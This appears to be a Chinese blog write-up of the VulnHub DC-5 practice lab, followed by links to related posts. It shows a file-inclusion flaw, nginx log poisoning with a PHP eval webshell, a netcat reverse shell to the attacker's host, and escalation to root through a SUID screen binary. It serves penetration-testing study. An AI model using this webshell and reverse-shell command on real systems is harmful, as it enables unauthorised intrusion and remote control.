靶机-DC5

最新推荐文章于 2024-10-16 08:21:04 发布
最新推荐文章于 2024-10-16 08:21:04 发布
阅读量382 收藏 10
点赞数 8
分类专栏: 靶机 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44796547/article/details/134653818
版权

srp-scan查找靶机IP

在这里插入图片描述

masscan扫描端口

在这里插入图片描述

nmap深度扫描

在这里插入图片描述

端口:80,111,37895

dirsearch扫描目录,御剑和dirb没扫到多少

在这里插入图片描述

[19:49:42] 200 -    4KB - /contact.php
[19:49:43] 301 -  184B  - /css  ->  http://192.168.253.135/css/
[19:49:49] 200 -    6KB - /faq.php
[19:49:50] 200 -   17B  - /footer.php
[19:49:54] 301 -  184B  - /images  ->  http://192.168.253.135/images/
[19:49:54] 403 -  570B  - /images/
[19:49:55] 200 -    4KB - /index.php
[19:50:31] 200 -  852B  - /thankyou.php

http://192.168.253.135/contact.php

主页发现提交框

在这里插入图片描述

在这里插入图片描述

发现http://192.168.253.135/footer.php中年份会变

在这里插入图片描述

http://192.168.253.135/thankyou.php也会变,推测包含footer.php

在这里插入图片描述

不难推测参数是上面提交的

在这里插入图片描述

文件包含

/thankyou.php?file=/etc/passwd 发现确实存在漏洞

在这里插入图片描述

写入一句话

前面信息收集发现网站web容器为nginx,nginx的日志文件路径一般为/var/log/nginx/access.log

把访问路径更改为木马文件

/hack  <?php @eval($_REQUEST[cmd]);?>

页面回应404

在这里插入图片描述

访问日志文件查看是否生效

/var/log/nginx/access.log和/var/log/nginx/error.log

查到路径

在这里插入图片描述

蚁剑连接

在这里插入图片描述

反弹shell到kali

nc -e /bin/bash 192.168.253.129 9999

利用python脚本开启交互模式,在kaili上输入命令行

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

接下来找找看是否存在root权限无密码的存在,输入命令行

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

发现screen-4.5.0,尝试

查找相关漏洞

在这里插入图片描述

复制到当前目录

在这里插入图片描述

通过蚁剑上传靶机tmp目录下

在这里插入图片描述

在tmp下执行sh

在这里插入图片描述

获取root权限,找到flag

在这里插入图片描述

随风随梦自在逍遥
关注
专栏目录
vulnhub靶机-DC5-Writeup
liuhanzhe的专栏
12-08 207
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-5,314/ DESCRIPTION DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The plan was for DC-5 to kick it up a notch, so this might not be
vulnhub靶机-DC系列-DC-1
qq_45953122的博客
08-08 417
DC-1详解
DC-5靶机
mlws1900的博客
03-25 860
得知文件包含漏洞,我们可以在ssh日志,中间件日志以及临时文件中写入一句话木马然后进行包含,即可解析。我们可以利用nginx日志写入一句话木马。切换nat模式,有问题全选重试和是,打到这了,我感觉这个配置我都不用写了,启动靶机如下图所示即可。啥玩意没有,点击contact,发现一个留言板,测试了xss啥也没有。以上操作要在bp中发包,我直接在浏览器中修改,不知道为什么无法写入。如上图所示,我试了在浏览器中无法写入日志,打开蚁剑连接shell。上面那个没试过,下面这个试了成功, 都需要在bp中进行操作。
靶机-DC2
-----------------------------------------------------------------------------------------
11-27 985
修改 hosts 文件来访问网站。使用 cewl 制作字典。使用 wpscan 对 WordPress 站点进行扫描和爆破。rbash 绕过sudo 提权git 提权如果不能输入,说明你的shell窗口不够小。[外链图片转存中…(img-f5Hv34cb-1701085667765)]找到最后flag[外链图片转存中…(img-RbBeuBEM-1701085667766)]修改 hosts 文件来访问网站。使用 cewl 制作字典。
DC系列靶机-DC2
慕舟舟的博客
10-12 1014
rbash逃逸的时候要根据具体的情况选择合适的方法;git提权;对市面上常见的cms,要选择合适的工具,可以达到事半功倍的效果;hosts文件,且它的解析优先级比DNS更高,可以将目标主机ip地址和域名写入hosts文件;使用nmap扫描的时候,有时候处于安全考虑,会修改ssh服务的端口;
VulnHub靶机 DC-5 打靶 渗透测试详细过程
rumil的博客
04-18 1190
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
靶机-DC3
-----------------------------------------------------------------------------------------
11-27 925
在Joomla框架中,Templates是直接存在于根目录下的,于是我们进行访问查看一句话木马是否上传成功,我们进入网站查看测试。接着我们下载该压缩包并放到kali桌面里,解压该文件,然后在桌面开启http服务,将下载好的文件导入到DC-3靶机里。在http://192.168.254.3/index.php发现编写处,发现有过滤,跳过。进入解压后的目录中,按照searchsploit工具中的提示进行提权。使用joomscan来扫描DC-3。2、安装joomscan。看到sqlmap 语句。
DC系列靶机-DC1
慕舟舟的博客
10-10 286
首先下载所需的靶机环境;安装好工具(kali);解压之后直接在VMware中打开即可;
渗透测试学习之靶机DC-5
xdbzdgx的博客
11-18 5779
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
vulnhub系列靶机--DC3
cyzCc的博客
02-23 526
vulnhub系列靶机–DC3 主机发现: 先主机发现找到靶机的ip 使用nmap nmap -sP 192.168.211.0/24 netdiscover -r 192.168.211.1/24 根据MAC地址可以确定靶机的ip为192.168.211.136 然后扫描该ip所开放的端口服务 nmap -A 192.168.211.136 -p 1-65535 发现靶机只开放了80端口,访...
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 646
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
vulnhub靶机-DC4-Writeup
liuhanzhe的专栏
12-08 249
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-4,313/ DESCRIPTION DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. Unlike the previous DC releases, this one is designed primarily fo
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 1179
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
S7-200 SMART 与 S7-1200 之间 TCP 通信— S7-200 SMART 作为服务器
最新发布
gsjkwg的博客
10-16 879
在 “项目树” > “PLC_1” > “设备组态” 中,选中 CPU ,然后在下面的属性窗口中,“属性” > “系统和时钟存储器” 下,将时钟位定义在 MB0,如图2所示。通过“项目树”>“PLC_1”>“程序块”>点击生成的 “数据块_1” ( DB4 ) ,右键属性,取消勾选“优化的块访问”。通过“项目树”>“PLC_1”>“程序块”>“添加新块”,选择“数据块” 创建全局 DB 块,点击“确定” 生成数据块。指令块位置及调用方法参考 TCON 指令的调用,调用结果如图8所示。
前端开发攻略---8种方法实现在浏览器中跨页面通信
nibabaoo的博客
10-15 1259
浏览器实现跨标签页通信的多种方式
Linux系统性能调优技巧详解
运维人生
10-13 615
Linux系统性能调优是一个复杂而持续的过程,需要综合考虑硬件、软件、内核参数、进程管理等多个方面。通过合理的调优措施和持续的监控调整,可以显著提升Linux系统的运行效率和稳定性,为业务提供强有力的支持。性能调优是一个持续的过程,需要不断地监控、分析和调整,以适应不断变化的工作负载和系统环境。希望本文的介绍和代码示例能够帮助您在Linux系统性能调优方面取得更好的效果。
找到占用5601端口的进程ID
m0_46695127的博客
10-13 287
找到占用5601端口的进程ID
【信息安全管理与评估】2023年全国职业院校技能大赛赛题第04套
Play_Sai的博客
10-15 1012
取证的信息可能隐藏在正常的、已删除的或受损的文件中,您可能需要运用编码转换技术、加解密技术、隐写技术、数据恢复技术,还需要熟悉常用的文件格式(如办公文档、压缩文档、图片等)。A 集团的 Ubuntu 服务器被黑客入侵,该服务器的 Web 应用系统被上传恶意软件,系统文件被恶意软件破坏,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行全面的检查,包括日志信息、进程信息、系统文件、恶意文件等,从而分析黑客的攻击行为,发现系统中的漏洞,并对发现的漏洞进行修复。这种攻击叫做( )。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值